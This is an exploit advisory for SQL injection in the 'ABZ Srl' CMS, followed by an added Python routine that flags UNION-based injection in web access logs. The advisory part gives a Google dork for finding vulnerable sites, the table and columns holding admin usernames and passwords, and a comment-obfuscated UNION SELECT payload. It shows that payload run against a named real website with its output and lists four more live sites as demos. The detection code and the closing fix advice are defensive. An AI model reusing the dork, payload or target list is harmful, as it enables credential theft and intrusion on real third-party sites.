[+] Exploit Title: (ABZ Srl) CMS SQL Injection
[+] Exploit Author: Medrik
[+] Found Date: 13-03-2014
[+] Vendor Homepage: http://www.abzsrl.com/
[+] Google Dork: intext:"powered by ABZ Srl" inurl:pagine.php?id=
[+] Tested on: Windows
==========================================
[+] Exploit (Vulnerability Location):
http://[vulnerable_host]/pagine.php?id=IdNumber[SQLi]
The `id` parameter of pagine.php is injectable; the injection can be driven with tools such as sqlmap or others.
[*] Important Table : AMMINISTRAZIONE
[*] Important Columns : For User : [ USERN ] & For Password : [ PSWD ]
[*] Example PoC For Database Version :
+/*!union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[*] Test :
http://www.reginanewhouse.com/pagine.php?id=2+/*!union*/+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[*] Response For Test : 5.5.36-34.2-log
[*] Admin Page : /admin
[*] Image : http://i.imgur.com/wNAWyBI.png
==========================================
[+] Demo(s) :
(#) http://www.reginanewhouse.com/pagine.php?id=2[SQLi]
(#) http://www.gruppo-ria.com/pagine.php?id=2[SQLi]
(#) http://www.euroxoro-torino.it/pagine.php?id=7[SQLi]
(#) http://www.dimsegnaletica.com/pagine.php?id=4[SQLi]
==========================================
[+] Gr33tz : R33VES , Enddo , Beni_Vanda , Explo!ter , Black.KinG , M.R.S.CO , MR.0x41 , Dr.3v1l
==========================================
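The PoC above hides the UNION keyword inside a MySQL versioned comment (`/*!union*/`) and URL-encodes the parentheses, which defeats naive keyword filters. The following detection routine is an added example, not part of the advisory: it assumes Apache/nginx combined-format access logs, undoes the encoding and comment wrapping, and flags UNION ... SELECT sequences in any query parameter of pagine.php requests. The log lines are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Assumed combined log format: the request line is the quoted "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# MySQL executes /*!...*/ "versioned comments"; unwrap them so the keyword shows.
VERSIONED_COMMENT_RE = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
UNION_SELECT_RE = re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b", re.I)

def normalize(value: str) -> str:
    """URL-decode twice (double-encoded payloads), unwrap /*!..*/ comments,
    drop ordinary /*..*/ comments, collapse whitespace, lowercase."""
    decoded = unquote_plus(unquote_plus(value))
    decoded = VERSIONED_COMMENT_RE.sub(r" \1 ", decoded)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", decoded).strip().lower()

def is_union_sqli(target: str) -> bool:
    """True if any query-string parameter carries UNION ... SELECT after normalization."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return any(UNION_SELECT_RE.search(normalize(v))
               for values in params.values() for v in values)

def scan_log(lines):
    """Return (line_number, request_target) for every suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and is_union_sqli(m.group("target")):
            hits.append((n, m.group("target")))
    return hits

# Constructed sample log lines (not real traffic); line 2 mirrors the advisory's PoC shape.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Mar/2014:10:00:01 +0100] "GET /pagine.php?id=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [13/Mar/2014:10:00:07 +0100] "GET /pagine.php?id=2+/*!union*/+select+1,version%28%29,3,4,5 HTTP/1.1" 200 5210',
    '198.51.100.9 - - [13/Mar/2014:10:01:00 +0100] "GET /pagine.php?id=4+/*!50000UnIoN*/%20/**/SeLeCt%201,2 HTTP/1.1" 200 5200',
    '198.51.100.9 - - [13/Mar/2014:10:01:30 +0100] "GET /pagine.php?id=7&q=union%20station HTTP/1.1" 200 5000',
]

if __name__ == "__main__":
    for n, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: suspected UNION SQLi in {target}")
```

Detection only narrows the window; the application-side fix is to bind `id` as an integer parameter in a prepared statement instead of concatenating it into the query.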